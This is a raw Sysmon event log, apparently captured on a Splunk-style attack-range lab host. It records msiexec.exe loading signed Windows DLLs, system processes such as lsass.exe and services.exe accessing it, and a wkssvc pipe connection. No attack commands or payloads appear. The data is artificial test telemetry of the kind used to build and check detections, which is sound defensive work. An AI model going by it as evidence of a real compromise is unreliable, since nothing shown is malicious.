15:05:01.506{7CF983DC-EE56-62A8-0A00-000000006202}6043656C:\Windows\system32\services.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 734700x80000000000000002691203Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691202Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691199Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691198Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691197Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691196Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691195Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691194Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691193Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691192Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691191Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691190Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691189Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691188Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32full.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F284A98093B423946252259D7D2857D3,SHA256=193F70529B68EF108EA17ABC069E6DACF4541A547DF1D2F249F7555A58BCFA07trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691187Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691186Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691185Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691184Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691183Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\AppPatch\apppatch64\AcLayers.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Windows Compatibility DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationACLAYERS.DLLMD5=18D8E2D6C17577D91A40C4A5AD9F6E37,SHA256=9E9CF9446EDA1F064E996F2022DBD3B3C7D6778574EA790B2B0412EA41C5F5F0trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691182Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\apphelp.dll10.0.14393.4350 (rs1_release.210407-2154)Application Compatibility Client LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationApphelpMD5=92330FA0551BFFBB8C1C97E86F9A0264,SHA256=0F341AF375236EBF7047F6AE50F2834566F0D859F0F02B8A5FFD7F29C31B0117trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691181Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484FtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691180Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=92D599E644B89C0F9E7DDB55762EBEA6,SHA256=F32D28EE73EADAF9EF3F30145FA3C52B88DF47236B8747434750832BF1B9CDEEtrueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691179Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691178Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 10341000x80000000000000002691177Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-EE55-62A8-0500-000000006202}396512C:\Windows\system32\csrss.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 10341000x80000000000000002691176Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.491{7CF983DC-EE56-62A8-0A00-000000006202}6044680C:\Windows\system32\services.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6f523|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMNT AUTHORITY\SYSTEM 154100x80000000000000002691175Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.467{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exe5.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Windows® installerWindows Installer - UnicodeMicrosoft Corporationmsiexec.exeC:\Windows\system32\msiexec.exe /VC:\Windows\system32\NT AUTHORITY\SYSTEM{7CF983DC-EE56-62A8-E703-000000000000}0x3e70SystemMD5=F10B3635225BE24A677CB3BB71824D07,SHA256=B5D755B0B561AA8FDAFF156E3715A333179B14C171EFB53392D4D806D14CF9C9{7CF983DC-EE56-62A8-0A00-000000006202}604C:\Windows\System32\services.exeC:\Windows\system32\services.exeNT AUTHORITY\SYSTEM 734700x80000000000000002691174Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\coml2.dll10.0.14393.2608 (rs1_release.181024-1742)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOML2.DLLMD5=F51CCB7A95B83C1327390BF672AFD328,SHA256=850E50B525EF51374B880146E26464D10A8B1DAE1E0307F7B27DC7322824F2BFtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691149Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691120Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.444{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691119Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.444{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691118Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.444{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691117Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.444{7CF983DC-EE56-62A8-0B00-000000006202}6121816C:\Windows\system32\lsass.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691116Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.444{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 18141800x80000000000000002691114Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-ConnectPipe2022-06-17 15:05:01.444{7CF983DC-981D-62AC-196B-000000006202}4000\wkssvcC:\Windows\system32\msiexec.exeWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691113Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.444{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691112Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.444{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691111Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691110Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691109Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\System32\msiexec.exeC:\Windows\System32\msctf.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=CA0121D9089BBFE1CB95A04E09E04C90,SHA256=B264FBE125E02FFBCDBBFF811B75B3ECEF31FD7762BD67BEE41492ED33CC146FtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691106Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691105Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:01.428{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-981D-62AC-196B-000000006202}4000C:\Windows\system32\msiexec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691104Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 